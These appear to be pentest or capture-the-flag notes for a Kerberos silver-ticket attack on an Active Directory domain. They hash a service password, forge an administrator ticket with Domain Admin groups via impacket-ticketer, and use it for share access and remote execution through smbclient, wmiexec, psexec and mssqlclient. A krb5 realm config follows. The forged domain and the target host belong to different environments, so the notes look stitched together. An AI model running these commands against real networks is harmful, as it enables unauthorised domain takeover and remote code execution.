echo -n 'Service1' | iconv -t utf16le | openssl dgst -md4
impacket-ticketer -nthash e3a0168bc21cfb88b95c954a5b18f57c -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain NAGOYA-INDUSTRIES.COM -spn MSSQL/nagoya.nagoya-industries.com -groups 512,513,52 administrator
export KRB5CCNAME=$(pwd)/administrator.ccache
impacket-smbclient -k -no-pass //SQL01.haero.local/C$ -target-ip SQL01.haero.local
# or for remote exec (requires local admin)
impacket-wmiexec -k -no-pass SQL01.haero.local
impacket-psexec -k -no-pass SQL01.haero.local
impacket-mssqlclient -k -no-pass SQL01.haero.local -windows-auth
curl --negotiate -u : -k https://SQL01.haero.local/
/etc/krb5user.conf
[libdefaults]
default_realm = NAGOYA-INDUSTRIES.COM
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
dns_canonicalize_hostname = false
fcc-mit-ticketflags = true
[realms]
NAGOYA-INDUSTRIES.COM = {
kdc = nagoya.nagoya-industries.com
}
[domain_realm]
.nagoya-industries.com = NAGOYA-INDUSTRIES.COM